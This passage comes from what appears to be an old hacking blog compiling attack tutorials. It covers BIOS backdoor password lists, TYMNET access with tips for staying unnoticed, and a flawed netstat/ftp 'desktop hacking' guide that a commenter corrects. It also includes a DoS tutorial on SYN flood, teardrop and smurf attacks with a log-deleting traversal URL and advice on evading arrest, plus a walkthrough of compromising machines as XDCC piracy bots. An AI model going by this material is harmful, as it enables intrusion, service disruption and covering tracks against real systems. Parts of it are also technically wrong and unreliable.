4. Start Fpipe with the command of "fpipe -l 80 -s 1863 -r 1863
messenger.hotmail.com"
5. now with fpipe running you can now connect and run windows messenger

For those that want to do this with other chat programs Im 1 step ahead of
you

AOL SERVER- login.oscar.aol.com port 5190
ICQ SERVER - login.icq.com port 5190
WINDOWS MESSENGER SERVER - messenger.hotmail.com port 1863
YAHOO SERVER - cs.yahoo.com port 5050

Hacking CMOS/BIOS

2008-12-10T23:26:00.000+07:00

Your CMOS holds a lot of important information so before you go messing
around with the battery WRITE DOWN YOUR SETTINGS, I can't stress that
enough. When you pull the battery it will set your cmos back to factory
defaults, so you'll need to know how to put everything back.

There are a few different ways to reset the cmos, here's a few:

1. there are many default common passwords,
such as:

At boot-up note the BIOS provider (Award, AMI, Phoenix, IBM, etc.)

For Award BIOS' try these backdoor passwords:

AWARD_SW
j262
HLT
SER
SKY_FOX
BIOSTAR
ALFAROME
Lkwpeter
j256
AWARD?SW
LKWPETER
syxz
ALLy
589589
589721
awkward
CONCAT
d8on
CONDO
j64
szyx

For AMI BIOS' try these backdoor passwords:

AMI
BIOS
PASSWORD
HEWITT RAND
AMI?SW
AMI_SW
LKWPETER
A.M.I.
CONDO

For PHOENIX BIOS' try this backdoor password:

phoenix

there are too many to count here's a list
http://www.phenoelit.de/dpl/dpl.html
(search for PC BIOS)

2. On some older PC's pressing the insert key upon startup will clear
the CMOS, make sure you hold it down till it's done booting.

3. Another way which we pretty much already covered, was to pull the
metallic nickel looking battery that supplies power to the CMOS.

4. Some times there is a small three pin jumper used to reset the bios,
just move the black little pin cover to the opposite two pins.
(Make sure to read the motherboards manual before this)

5. If the battery is soldered in you can take a soldering iron to it but
I don't recommend it unless you are a professional.

6. there are a few programs out on the net which are made to crack
certain types of bios passwords, I have one for award BIOS's here's a
couple:

http://www.11a.nu/ibios.htm

http://natan.zejn.si/rempass.html

Good reading:
http://www.astalavista.com/library/...ios_hacking.txt

http://www.virtualplastic.net/html/misc_bios.html

Tools:
http://www.red-demon.com/pwrecovery.html

Hacking TYMNET

2008-12-10T23:24:00.000+07:00

TYMNET IS A GATEWAY SYSTEM, LIKE TELENET. AND CAN BE USED TO ACCESS SYSTEMS
THAT MIGHT NOT OTHERWISE HAVE LOCAL NUMBERS. THIS IS JUST A BASIC FILE,
INTENDED FOR SOMEONE WHO HAS NEVER USED TYMNET BEFORE, OR TO HELP SOMEONE WHO
IS LEARNING TO USE TYMNET.

CONNECTING:
-------------

MOST TYMNET SYSTEMS USE THE FOLLOWING SETTINGS:

--- FULL DUPLEX
--- NO PARITY (OFF OR SPACE PARITY)
--- 1 STOP BIT
--- MOST ARE 300/1200 BAUD

ALSO, MOST USE CONTROL-S TO PAUSE LISTING AND CONTROL-Q TO RESUME LISTING.
CONTROL-X STOPS LISTING.
TO ENSURE THAT YOU ARE ALLOWED TO USE CONTROL KEYS, ENTER CONTROL-R BEFORE
TELLING TYMNET WHO YOU WISH TO LOG ONTO.

FOR THOSE OF YOU WHOSE TERM ARE CAPABLE OF SENDING AN ESCAPE, AN ESCAPE WILL
GET YOU BACK TO THE [...LOG IN] AREA IF YOU EVER FIND YOURSELF STUCK IN A
POSITION WHERE YOU ARE ABOUT TO BE DISCONNECTED.

WHEN YOU FIRST CONNECT WITH TYMNET;

[PLEASE TYPE YOUR TERMINAL IDENTIFIER]

WILL PRINT ACROSS YOUR SCREEN. SOMETIMES THIS WILL BE NOTHING BUT A BUNCH OF
GARBAGE, WHICH COULD MEAN THAT YOU CONNECTED AT THE WRONG BAUD, OR THAT YOUR
SYSTEM WILL NEED AN ID LETTER OTHER THAN 'A' OR 'E'. BUT, FOR MOST PURPOSES,
'A' WILL BE THE LETTER THAT YOU WILL ENTER, BUT 'E' IS ALSO A COMMON ID.
HOWEVER, B,C,D,F,G,I,AND P ARE ALSO VALID ID'S.

(COMMIES, APPLES, TI'S & TRS'S USE 'A' OR 'E')

THEN A LOCATION NUMBER, WILL BE SHOWN.

[-4004-075-]

AFTER THAT, TYMNET WILL ASK YOU TO;

[PLEASE LOG IN.]

YOU WILL ENTER THE SERVICE NAME OR INITIALS AND BE SENT TO THAT SERVICE.

(EXAMPLE:)

[PLEASE TYPE YOUR TERMINAL IDENTIFIER] A
[-4004-075-]

[PLEASE LOG IN.] IBM

------

IN THE EXAMPLE, TYMNET SENT EVERYTHING IN [] BRACKETS, AND YOU ENTERED
EVERYTHING IN LOWER CASE.

FOLLOWING THAT PROCEDURE WOULD SEND YOU TO IBM.

SYSTEMS ON TYMNET:
--------------------

TRY USING NAMES, OR SIMPLE 3-5 CHARACTER CODES. REMEMBER, NEW USERS ARE
SUPPOSED TO BE ABLE TO USE TYMNET SECONDS AFTER UNPACKING THEIR COMPUTERS,
SO THINK SIMPLE.

ALSO, TRY GETTING A BUNCH OF SYSTEM NAMES THAT WORK ON TELENET, UNINET,
OR DATAPAC AND TRY THEM ON TYMNET. TRY ENTERING THE NAME, INITIALS OR
INITIALS & NUMBERS.

--- EXAMPLES:

DOW1;; & DOW2;; = DOW JONES, WHEN TYMNET ASKS FOR SERVICE, ENTER 'DJNS'.
STANDARD
10 CHARACTER PASSWORD.

CIS01 & CIS02 & CPS = COMPUSERVE, STANDARD FORMAT.

LEXIS & NEXIS = LEXIS & NEXIS, WHEN IT ASKS FOR TERMINAL ID, ENTER '.LEXIS' OR
'.TELV950'

NEWS1 = NEWSNET

ONTYME = ONTYME (MCDONALD DOUGLAS INTERNATIONAL DATA LIBRARY)

IBM = (WHAT ELSE?) I.B.M

ART = HONEYWELL'S 'SYSTEM M'.

DIR. = DIRECTORYNET.

TEL = ??? (CONTACT ME IF YOU FIND OUT)

INDEX = MTECH/COMMERCIAL SERVICES DIVISION.

VAX1 = UCC UCEL ON-LINE

OPER = NET940/111

PLINK = PEOPLE/LINK 6 CHAR ID. 9 CHAR PASSWORD.

-----

TYMNET GATEWAY NUMBERS:
-------------------------

WASHINGTON (206): 825-7720, 754-3900, 375-3367, 285-0109, 747-4105, 272-1503
693-0371, 453-1591, 825-7781

ALABAMA (205) : 236-2655, 942-4141, 882-3003, 343-8414, 265-4570, 345-1420

ALASKA HAS 'ALASKANET' A SIMILAR SYSTEM.
ARIZONA (602) : 254-5811, 790-0764

CALIFORNIA (818): 308-1800, 789-9002, 841-7890
(714): 371-2291, 594-4567, 966-0313, 370-1200, 498-9504,
(415): 778-3420, 952-4757, 682-3851, 490-7366, 430-2900, 836-8700

COLORADO (303) : 590-1003, 830-9210, 356-0425, 543-3313

CONNETICUT (203): 242-7140, 773-0082, 226-5250

FLORIDA (305) : 395-7330, 463-0887, 466-0661

GEORGIA (404) : 546-0167, 446-0270, 722-7967, 327-0369, 424-0025, 291-1000

HAWAII (808) : 528-4450

IDAHO (208) : 343-0404, 523-2964, 233-2501

KENTUCKY (502) : 782-0436, 499-7110

LOUISIANA (318) : 443-9544, 237-9500, 436-1633, 322-4109, 688-5840

MICHIGAN (313) : 662-8282, 963-3388, 963-8880, 963-2353, 732-7303, 459-8900
985-6005, 569-8350
(517) : 787-9461, 484-6602, 631-4721

MONTANA (406) : 252-4880, 586-7638, 494-6615, 727-0100, 728-2415

NEBRASKA (402) : 475-8659, 397-0414

NEVADA (702) : 293-0300, 885-8411

OKLAHOMA (405) : 223-1552, 233-7903, 355-0745, 947-6387, 582-4433

OREGON (503) : 485-0027, 773-1257, 226-0627, 399-1453

TEXAS (713) : 427-5856, 556-6700

VERMONT (802) : 658-2123, 223-3519

THOSE AREN'T ALL THE TYMNET NUMBERS, BUT YOU SHOULD BE ABLE TO FIND ONE
TO CALL.

CAUTION:
----------

TYMNET SEEMS TO BE BECOMING AWARE OF HACKERS, AND CALLING THE SAME PLACE TOO
MANY TIMES IN A ROW COULD HAVE COMPLICATED RESULTS. ESPECIALLY IF YOU ONLY
GO TO 1 OR 2 DIFFERENT SYSTEMS.
TRY ALL THE ID'S UNTILL YOU FIND SEVERAL THAT WORK WITH YOUR SYSTEM, THEN
NOT ONLY CAN YOU GO TO SEVERAL DIFFERENT PLACES SO AS NOT TO ATTRACT ATTENTION
TO YOURSELF, BUT YOU CAN ENTER A DIFFERENT ID LETTER ALSO.

Hacking a Desktop using netstat and ftp

2008-12-10T23:19:00.000+07:00

Hacking a Desktop using netstat and ftp

I've noticed while on this site that although there are plenty of tutorials on netstat, there's nothing on how to hack a system using it. This is one way which I rather like, as it is especially useful on systems using stuff like Kazaa which leave ports open on your system. This won't work on more secure systems, as they won't generally have foreign ports open. Oh and by the way, this is my first article so feel free to post below any and all problems with it!

Finding an open port

First we need to know the target's IP. There are lots of ways of doing this, which I'm not going to go into here. After all, I usually do this on ppl who I know and who give me their IPs (I'm a white hat hacker not some pathetic little script kiddie cracker). Once you know their' IP, open a DOS prompt. In Windows XP that's

start->programs->accesories->command prompt

Now type the following into the command prompt:

netstat [target's IP] -a and press

What this does is look at all open ports on the target system. This means that you'll be shown a list of all the open ports. We aren't interested in the local ports, so look straight at the second column and for a port number that looks promising. If the target has a trojan on their system, a port number of 49000-63000 roughly should be about right. If not, look for Kazaa or WinMX or whatever's open port.

Now open another command prompt and type:

ftp
open [target's IP] [Port number]

You've now got a connection to their machine! From here you can browse around and modify their file system using DOS. These commands are especially useful when doing this:

CD REMOTE-DIRECTORY Change Directory on a remote system. Type this and the directory you want to change to. you probably need to understand how the Windows filesystem is organised for this to work.

DIR Display directory. Shows all the files and folders in this directory.

PWD Prints the name of the current remote directory.

CD .. Go up one level in directory.

-----------------------------------------------------------
thx to Bloodvessel for the follwing commands:

Transferring files

get test Copies file "test" from remote to local host (from current remote directory to current local directory).
mget test.* data.dbf Copies files beginning with "test" and the file named data.dbf from remote to local host.
put test Copies file "test" from local to remote host. You musth have write access to the remove host for this to work.
mput test.* data.dbf Copies files beginning with "test" and the file named data.dbf from local to remote host.
quit Closes connection and terminates FTP session
If a file name contains spaces (e.g. on your Windows system) you should type the file name in quotation marks " ", but it is strongly recommended to rename such files before FTPing them.

Other Commands

get test "| more" - displays file "test"
To make sure you want a document, you can display it with the more command and see the file screen by screen (using the space bar) BEFORE you get a file. To exit out of more , type q.

prompt Turns off prompting for individual files when using the mget or mput commands.

If you have mistyped your username or password, use the user command to re-login.

For a list of all FTP commands type ? at the ftp> prompt.
For a brief explanation of a command, type help, leave a space,and type the command itself.

-----------------------------------------------------------

Why does this work?

When we use the netstat command on a machine, it searches for open ports. This means that if, for instance, the target machine is connected to Kazaa, there will be a port opened with Kazaa. There are different kinds of ports, the most common being TCP and UDP. Most things on a computer have their own port; for instance, a printer and a scanner have their own port, though these are generally unhackable as they are in local ports, not foreign ones.

So, supposing the target does have an open port, it is possible to connect to them using ftp, or File Transfer Protocol. This is what is used when downloading off people, and is another reason why file sharing desktops (running Kazaa,WinMX etc) are so easy to hack when using this method; they already have a port or more open, downloading, which means that the their firewalls must be pretty much non-existant.

By typing the ftp command, we make our system an ftp server. This operates the same way basically as a web server. Once we are an ftp server, we can open a link with another computer through an open port. This literally means that we are sharing files with this computer, so if the target was alert to the attack, it could do what it wanted back. Still, this is unlikely, so on with the article!

Once we've opened a file transfer protocol with the target, we can do what we want using DOS commands in the prompt. how about leaving a text file on the desktop saying 'Hacked by...' That's sure to get the target to update their security!

Well, I hope that this article was helpful. As I said at the top, feel free to post below modifications to whats in here, as it may not all be completely correct. This process seems to work for me, but tell me your own experiences with it.

Thanks, The Real Tim Shady

EDITS

Finding target's IP

Did you know that you can find out people's IPs using netstat? If you're connected to them via ICQ, AIM and possibly MSN, then a quick Netstat check on your own system will show an open port to their machine along with their IP address! Simply use that IP address and you can hack their machine!

Portscanners

Another point that I have noticed is that it is possible to use a portscanner to check for open ports if the remote netstat command doesn't work. I'm not going to give you the addresses of where you can download them, but I reccomend Portscan Plus, because its easier to use. I know I say in the description that you shouldn't need to use any programs, but this one is optional, and I personally don't bother.

A little tip

Look for port 139 if you wanna ftp without netstat or a portscanner, as they may have a printer and file share.

Another way to find ports to go through

I find that a very useful way of finding ports to go through is to run a file like Kazaa on yourself and check netstat on your own machine. This will show you the ports Kazaa or whatever program you're using goes through, and the chances are that they'll be the same on your target's computer.

Now thats tuts good,but when i try and connect to them via windows ftp it dont work,so i tried using my ftp client and it says

Connecting......
Connected
Socket connected waiting for logon sequence...

And thats all it says.

Normally I don't bite - but after a 26hr stint at a downed exchange server, I'm a bit touchy...

quote: netstat [target's IP] -a

My versions (on Linux, XP, 2K, NT, AIX) of netstat are not capable of portscanning a remote machine... fine to show me what I have connected or listening though.

quote: ftp
open [target's IP] [Port number]

You've now got a connection to their machine! From here you can browse around and modify their file system using DOS

Err, only if the port you pick has an unsecure ftp server listening on the other end - otherwise [as long as it's still an ftp server] you'll still need a username and password. And the command language is not DOS. It's ftp. It won't allow access to the whole file system - onyl what they've exposed. It won't allow you to run applications, but might let you copy [exposed] files off or even might let you out some files on their server.

quote: When we use the netstat command on a machine, it searches for open ports

No It shows you what your local machine has open.

quote: By typing the ftp command, we make our system an ftp server.

No by running an application like IIS, ftpd, Warftpd etc - we make our system into an ftp server. By typing ftp, you open up the ftp client.

quote: Once we've opened a file transfer protocol with the target, we can do what we want using DOS commands in the prompt. how about leaving a text file on the desktop saying 'Hacked by...'

No ftp clients don't use DOS, and I doubt very much that anyone would leave an unsecured ftp server on an unspecified port with full access to the whole system. If you 'owned' someone elses machine, would you leave it a a free-for all for all the script kiddes? or harden it leaving a secure encrypted back channel for your own personal use?

How To DDoS ATTACK

2008-12-10T23:09:00.001+07:00

What is a DoS attack ?

A Dos (denial of service) attack is a kinda attack which exploits an existing vulnerability in the operating system or in the softwares of the target machine or Internet Protocols like TCP/IP thus bringing down the aimed service or sometimes all the services of the target system. In short it prevents legitimate users to use the services offered by the target system. Well a very simple example of such attack is ping.. Previously in unpatched Win 95 systems TCP/IP protocols can only handle a data packet within the size of 64400 bytes.. thus a simple ping with the command line : ping –t –l 65500 causes the system to crash or reboot.. its an example of the most simplest DoS used to be implemented in the previous days..

Nowadays this ping attack is quite lame cause almost all the operating systems are patched to prevent such attacks.. Nowadays advanced sophisticated attacks like SYN Flooding, Tear Drop, Smurf, TARGA3, Semirandom etc. are used. there are many more DoS techniques but I’ll mension only those which are more or less assymetric in nature..(I’ll explain it later)

There are generally two types of DoS attack.
1. Magic Packets Attack: In this attack an attacker causes a DoS by exploiting an existing vulnerability in the OS running in the target system or softwares of the target system by sending few specially designed data packets to particular ports. Example: Ping of Death, WinNuke.
Inside Info: well one more example I’ll give about this kinda attack regarding Windows XP which I have recently discovered while a friend of mine was playing a 3D game in my computer.. it’s the MEMORY DUMP bug.. you can say it is a vulnerability existing in Windows XP (I don’t know about the previous versions) waiting to be exploited by intelligent and experienced Hackers.. In Windows XP what happens is that it uses a dump file (%systemroot%\MEMORY.dmp or c:\windows\MEMORY.dmp) to allocate some memory for debugging informations.. by default it is 64 KB.. if somehow remotely the size of this file is made to exceed 64 KB (considering that the user haven’t change the default size limit of this file which is 64 KB) then the system will definitely reboot..
2.Resource Exhaustion Attack: Just as the name indicates this kinda attack depends on the fact that every computer system has definite amount of utilisable system resource. In this kinda attack the attacker sends unlimited amount of data packets in a special well planned method in an attempt to overload the system resource and the RAM of the target system thus compelling it to crash or hang or reboot.
Example: ICMP (Internet Control Message Protocol) Ping for network flood.

What is Asymmetric DoS ?

DoS attack can be implemented in a wide range of ways.. For example a T1 connection with a speed of around 10 Mega Bytes per second floods a network with a speed of only 56 kbps (as I have) then its quite obvious that the faster connection will easily flood the network lines of lesser bandwidth with data packets even by simple ping (considering he is in Unix OS.. cause windows does not allow sending of data packets larger than 64400 bytes).. But DoS attack can be performed in a very well planned sophisticated way in which a system with a bandwidth of as low as even 56kbps can bring down a system of very high bandwidth even 25 MBps..
For example if I send an ICMP ping request to a system in a network of considerable bandwidth with spoofed IP in such a way that the target systems thinks that the request is coming from a system within its network so as to compel it to send back the data packet to that particular system in its network thus causing a flood circle..
By repeating this process few times even from a 56 kbps dial up connection it is possible to bring down a network of high bandwidth cause a flood circle is developed within its internal network which will definitely overload the system resource..
It’s a kinda Magic Packet with Resource Exhaustion attack.. pretty sophisticated and intelligent.. right ??? I guess and hope so.. J Its called smurf attack. I’ll explain it in details later on this article..

Now lets begin with the main part of this manual ie.. commonly used DoS attacks and how to execute them..

SYN FLOODING

This kind of DoS attack is executed by exploiting the TCP/IP 3 way handshake based authentication system. In this attack what happens, an attacker floods the target computer with unfinished SYN requests.. Since the victim computer cannot finish these SYN requests it has to use its system resource to store temporarily these SYN request thus slowly overloading the system resource and finally ending up by crashing it or rebooting it..

What is TCP/IP 3 way authentication system ?

Well to understand and execute SYN Flooding flawlessly and effectively you need to understand the very basic of this kind of attack which exploits the TCP/IP 3 way authentication system.. Now I am sure most of you might be asking what the hell is TCP/IP 3 way authentication system..never heard about it..
Did you ever wondered how authentication takes place when you dial up to your ISP requesting for a connection to your ISP (Internet Service Provider)..

For a successful connection between two computers.. Host and Client a complete and successful 3 way handshake must take place..
First the client send a SYN Packet (SYN request) to the Host asking for a TCP/IP connection.
Second the host replies with a SYN/ACK packet to the client thus indicating its response and acknowledgement..
Third the client sends an ACK packet to the host thus completing the connection..

Client ---------------------à SYN ------------------------àHost 1st Handshake
Host --------------------àSYN/ACK--------------------àClient 2nd Handshake
Client----------------------àACK-------------------------àHost 3rd Handshake

This is the very basis of connection establishment between two computers Host and Client.. At first this procedure is carried out then the username password authentication or any other form of authentication takes place..

Note: SYN packets, ACK Packets are special data packets designed by the Operating System.

Now I guess you have quite a lot idea about 3 way handshake system.. I guess its not that tough to understand.. Another thing you need to know is about the FIN packet.. Just like SYN,ACK packets FIN is also a specially designed data packet which is send by computer systems to terminate connections with one another..

How to perform practically a SYN Flooding ?

Well when you have the knowledge of this kind of attack I mean you know how this kind of attack takes place and what made it a kind of DoS attack.. Its easy to perform..
You need to flood the target computer with unfinished SYN requests.. By unfinished SYN requests I mean only SYN packets not any ACK packet in response with the host’s SYN/ACK packet.. thus compelling it to crash or reboot..
Thinking practically, first I send a SYN packet requesting for a connection with the target system. Now the target system will definitely response with a SYN/ACK packet.. Now what I do is ignore this SYN/ACK packet from the host and I send a couple of more SYN request to the target system.. Firstly I have not completed the earlier 3 way handshake so the target system has a pending SYN packets which is loaded in its memory thus consuming system resource.. Secondly I send a couple of more SYN packets to the target system but did not response to the SYN/ACK packets from the host.. Thus slowly the resource of the target system is consumed by these pending SYN requests which are not being completed by me.. In this way I continued to flood the target system with thousands of SYN requests within a very short time. So what happens the target system’s resource is slowly consumed by these pending SYN packets and ending up with a system crash or reboot thus Denying the services it was offering to its valid users..

Well I am sure you might be asking again how to send SYN,ACK packets to a target system and how to ignore SYN?ACK packet from the target system..Is there any tools for it ??
Yes there are a lot of tools which lets you to send custom made data packets..
Try out Libnet (search in google.com or in http://www.packetfactory.com)
You can also try a very good DoS tool which offers a varied range of DoS attacks..
It is TFN2k.. (again search at google.com ..dont ask me about the tools..)

TEARDROP ATTACK
This attack is also executed by exploiting a vulnerability present is almost all the Operating Systems.. The packet reassembling Vulnerability.. This is a very intelligent kind of attack which can be carried out from a system with very little bandwidth. It’s a true example of asymmetric DoS.

What is Packet Reassembling Vulnerability ?

In explaining this vulnerability I am gonna give some practical example which will clarify all the intricacies of the packet reassembling vulnerability present in almost all the Operating System..
Say you have a 56 KBPS modem.. Now you want to send a file of around 1 MB to your friend through a direct connection as for example File Transfer in msn messenger, file transfer in AOL Instant Messenger, ICQ or by using FTP client-server.. Ever wondered how is it possible.. I mean you have a modem which had a capacity of only 56 Kilobytes per second of data transfer.. Now how come it is gonna transfer a file of 1 MB.. The answer is quite simple.. What actually happens is that the file is broken down into small fragments at the source system know as packets and all these packets are assembled at the target system to produce the original file..
Every packets of data which are send through the internet has two parts..
1. The Head Part : This part contains some important infos like sequence number, byte length, data type etc..
2. The Tail Part : It contains the actual information stored in the file..

The head part contains the info for reassembling..
Lets take a small example:
Say I wanna send a file of size 3000 KB to a friend of mine..
Now what happens this file is split up into say 3 parts each containing 1000 KB

Note: In practice the original fileis split up into much smaller parts.. I have sayed 3 parts only to avoid complications in explanation

Now these 3 parts are called data packets and each packet will carry 1000 KB..
The header part of the first packet will have a bye length of 1 – 1000
Similarly the header part of second and third packet will have a byte length of 1001-2000 and 2001-3000..
Now each packet has an OFFSET field which indicates which bye to which byte a particular data packet contains… Now according to this OFFSET field the data packets are reassembled in the target system to generate the original file..

The header part of the data packets in the above stated file transfer can be explained schematically as :

Data Packet No. Size OFFSET FIELD Type
1 1000 1-1000 TCP/IP
2 1000 1001-2000 TCP/IP
3 1000 2001-3000 TCP/IP

How to perform TEARDROP Attack ?

As for now I guess you are acquainted with packet reassembling system..
In case of teardrop attack this system is exploited..
In TearDrop attack custom made data packets with confusing OFFSET fields are send to the target system thus ending it up in system crash or reboot..

First I want to send a file of size say 5000 KB to the target system and the file is split up into 5 data packets each carrying 1000 KB at my end which is supposed to be reassembled in the target system.. For executing the teardrop attack on the target system I have to modify the OFFSET field of these data packets which will be send to the target system where the target system will attempt to reassemble it according to the OFFSET field..

Say the first packet will have a OFFSET field of 1-1000.. then 1001-2000 now I play the trick from the third packet onwards. I send the third packet with an OFFSET field of 2000-3000 , the fourth with 3000-4000 and the fifth with 4000-5000.. I am sure most of you have noticed that 2000,3000,4000 has appeared twice in the OFFSET field of the data packets send to the target system.. The target system will expect something like :
1 --à 1000
1001 --à 2000
2001 --à 3000
3001 --à 4000
4001 --à 5000

but actually it is getting something like:
1 ---à 1000
1001 ---à 2000
2000 ---à 3000
3000 ---à 4000
4000 ---à 5000

The target system will have no idea as how to handle this kind of data packets and reassembling this data packets according to TCP/IP or Ipv4 will result in system crash or reboot..

Tools to use: Again you can try Elite or TFN2K.. or if you’re a expert programmer in C or any other language then go for making your own program..

SMURF ATTACK

Well this is really an interesting example of asymmetric DoS attack. I think it’s a very smart, intelligent and sophisticated attack but has the capacity of causing a quake in the target network thus bringing down the entire network. Well what happens in this kind of attack is that an attacker uses simple ping flood with spoofed IP and tries to create a circle of flood among the target system and a system within its internal network.. I agree this is a little complicated to understand but its really usefull.. however the target computer may be secure and protected, it can be brought down with a well planned smurf attack.
To deal with this kind of attack you need to know and have a clear conception about IP Spoofing. I agree that IP spoofing may be new to you. In plain words IP Spoofing means to amend your IP with some other IP. For example my IP is 203.192.27.45 . By performing IP Spoofing I can establish a connection or send data packets to a remote system with some other IP say 64.4.44.8 (Probably Hotmail’s IP).. In plain and simple words IP spoofing means to bluff your IP to a remote system.
But wait a second.. aint it cool if the subject of IP Spoofing is so plain and simple as it seems to be and also regarded by some people.. I don’t know about other but practically I feel IP Spoofing is really a complicated subject but one of the most important in hacking.. The most important reason for it being so complicated is because it is a blind attack. You cannot actually see or realize what is the result of your actions on the target system.
To know more about IP Spoofing go through the article called “IP Spoofing Demystified” available in the books sections of http://blacksun.box.sk

Anyway I think I should give a little overview on IP Spoofing though I don’t think I am an expert in the subject.

What is IP Spoofing ?

Well as I have explained IP Spoofing in simple before in this article I don’t want to repeat it anymore. Here I want to explain its intricacies.
As I have explained earlier in this manual about the TCP/IP 3 way handshake authentication system. Another thing I need to say is that the header part of every data packet consists of a sequence number which is particular to that packet only. This sequence number helps the target system to distinguish that particular data packet.. They can be realized as 32 bit counters ranging between 0 to 4,294,967,295
Well in IP Spoofing what happens in order to establish a connection with a remote system with spoofed IP you need to send custom made data packets to the target system. According to the TCP/IP 3 way handshake authentication system, in response to your SYN packets the target computer will send a SYN/ACK packet to the spoofed IP.
For example:

Real: 203.197.48.1 SYN 64.4.44.1
Attacker ------------------------------------------------à Target
Spoofed: 203.197.44.250 SYN 64.4.44.1

IP: 64.4.44.1 SYN/ACK IP:203.197.44.250
Target ------------------------------------------------à Spoofed IP

Well now as you see in order to complete the TCP connection with the spoofed IP you need to send an ACK packet to the target system with a valid sequence number to establish the connection which is a real tough job. Anyway full explanation of IP Spoofing and sequence numbers and its implementations are beyond the scope of this manual. Read “IP Spoofing Demystified” [http://blacksun.box.sk] for more details..

IMPLENTATION OF SMURF ATTACK

So far now I think you know the basic overview of smurf attack. In this kind of attack what happens an attacker continuously ping floods the target system with an IP spoofed as the IP of a system within the internal network of the target computer. So what happens in response to your ping requests the target computer sends data packets to the spoofed IP ie. the system within its internal network which causes that system to resend it to our target system. So what happens our target system is being ping flooded from two ends and in one end a circle of ping of death is established which results in resource exhaustion of the target system resulting in system crash.
A WELL PLANNED DoS ATTACK

In here I am going to figure out some interesting methods of implementing a successful DoS attack.. Well I must agree the fact that I once thought of executing this method to the web server of one big company.. but finally end up when my father came to know about it and threatened me by telling that he will throw out me an my computer from the house..
Hence it is totally a plan of mine and I never practically verified its validity..

To start with I must say that whatever I do I always know what the hell I am doing. I don’t act like stupid script kiddies and get busted.. though I must agree I am not into real hacking.. First and foremost thing which comes in my mind is your security.. Say you executed a brilliant DoS attack which causes havoc in your target network but finally you end up spending days in government expense.. you got busted pal.. The only reason was that you don’t know what you were doing.. Next day in your news paper you will find a news like “ Hacker got caught for DoS “.. this seems to be pretty cool info for you and your friend.. But do you know how a real hacker will write this news.. he’ll write “ A Stupid script clicked some button and caused a DoS and since he doesn’t know what he was doing, he got busted “ . I guess it aint cool..

Now to begin with, say you tried to execute a SYN Flooding on your ISP’s web server. Ok, your lucky enough and somehow you managed to crash your target system but to your utter unconsciousness you forgot to remove the entries in their logs that you left while sending SYN packets or you lack the knowledge about how to remove entries.. generally IIS logs are kept in the folder: C:\Inetpub\wwwroot\_vti_log ..
Generally you can try cross site scripting in order to remove logs.. Though this method is quite lame and old and in most cases don’t work.. A cross site scripted attack URL looks like:
http://ISP.net/../../../../%systemroot%\system32\cmd.exe?del%20 C:\Inetpub\wwwroot\_vti_log\*.txt

This is just one method.. There are many other methods.. Generally experienced hackers aims at getting root on un protected systems associated with the main server and then attempting some kinds backdoor installation to the main system..

Now to me what I think a well planned DoS attack is the one in which you’re going to laid down the server simultaneously keeping yourself in the safe side thus protecting yourself from getting busted..
Well what I feel like doing is using shell accounts which allows uploading and installation of custom tools.. I guess you are familiar with shell accounts. These are accounts on a Unix based machines offered as a service by many website like http://freeshells.org which lets you use the resources of the Unix system in the server from your windows system using telnet and by logging into your account..
If you have a shell account like this you can try uploading your tools there and launching your attack from their server thus keeping yourself in the safe side..

Protection From DoS Attacks

Just like the attackers who are finding vulnerabilities to be exploited for causing a DoS attack the programmers of the softwares and particularly and most importantly Operating System are releasing patches for preventing such kind of attacks.. For example Microsoft has patched its OS to prevent SYN Flooding by limiting the number of SYN requests to be stored in the system memory thus preventing it from getting overloaded.. Well this is just one case.. SYN flooding can be executed in many ways and may be also be introduced in many ways in future which these patches wont be able to prevent.. So I think along with updating your softwares and Operating System with patches from its developers it is necessary to know about the attack which is being carried out against you and the vulnerability at your end which is being exploited.. so in order to prevent such attacks..

IRC XDCC BOTS

2008-12-10T23:07:00.000+07:00

This file was written in order to explain how all this XDCC on IRC is done.

Lets get right to the point.
XDCC bots are "hacked" computers that usually have weak NT passwords
becuase that is the simplest way to get them. Alot of the people that
accually get these bots dont accually know much about computer security
and are just using some kit that there friend gave them to get xdcc bots
for there channel.

American EDU's are the primary target of XDCC. Optonlines are also widly used because of
their speed.

As you will see all of these programs when used alone are not a security threat to anyone,
but when they are combined into a kit like this they can be used to steal thousands of
dollors worth of bandwidth. Please use the information provided to secure your high
bandwidth networks. The best way to prevent this is to scan your own network with the same
tools they use and see if you are valnerable at all.

Now onto the good stuff...

THE ATTACK:
1 - The "hacker" runs X-scan and scans a very large range of IP's. Sometimes he doesnt
Even scan from his own computer and may use a computer which has already been
compromised by him. At this point he is only scanning for Weak NT passwords.
2 - He looks through the scan logs and finds computer that have either no administrator
password, or an easly guessed administrator password. And usually finds quite a few.
3 - He then opens up IE (yes IE) and types "\\127.0.0.1" with the IP of the valnerable
computer in place of 127.0.0.1. He will then be prompted for a username and password,
and just enters the username and password that he received from X-scan.
4 - A series of files are then uploaded to the target computer, usually in the
C:\WINNT\SYSTEM32 directory.
These files are:
A) IROFFER - Iroffer is the accuall XDCC bot and is the program that connects to IRC,
displays what it has available to send, and sends the files to the users
who request them. usually sends are at very fast speeds. Iroffer requires
a config file and cygwin1.dll to run.
B) SERV-U FTP DAEMON - Serv-U is a very powerful FTP server. It is commonly used
because of its ease of use, its remote administrator, and because it allows
for remote execution which come in very handy when Tar'ing files.
C) SECURE.BAT - not always named "SECURE.BAT", but it does the same thing no matter
what it is named. This batch file will simply delete the IPC$, and the
C$ thourgh Z$ share. This will have an effect on the computer until
Windows has been restarted. The reason for removing these shares is so
that no one else can do the same thing that he just did.
D) FIREDAEMON - Used to start ordinary programs as services. This will execute IROFFER,
SERV-U, and SECURE.BAT before the user even logs on.
E) INSTALL BATCH FILE - This is what the "hacker" will use to install and configure firedaemon,
once he has installed the services, he starts the new services using "net start "
5 - The next step is the execute the INSTALL BATCH FILE. So he just goes to his command line
and types "PSEXEC \\127.0.0.1 C:\WINNT\SYTEM32\INST.BAT" that will execute psexec and tell
it to run the INSTALL BATCH FILE on the remote computer.
6 - The computer is now in the IRC channel and the ftp server has been started. He just uploads a few
games/movies/mp3s to the newly obtained bot and he is ready to start serving the latest pirated
software to a large amount of people.

That is really about all that there is to this.

Now to evade detection the person who is doing this crime will rename as many things he possibly can
to make them look like system files. For example, you are most likly now going to see iroffer.exe in
your C:\WINNT\SYSTEM32 folder, you might be named something like system32.exe ssvchost.exe.

Sometimes the people who accually get the bots will have other people scan for them if they do not know
how to remotly scan from a bot they have already obtained. This is common.

NOTES:

The "INSTALL BATCH FILE" looks something like this:
{
@echo off
SET MXHOME=c:\winnt\system32
SET MXBIN=c:\winnt\system32
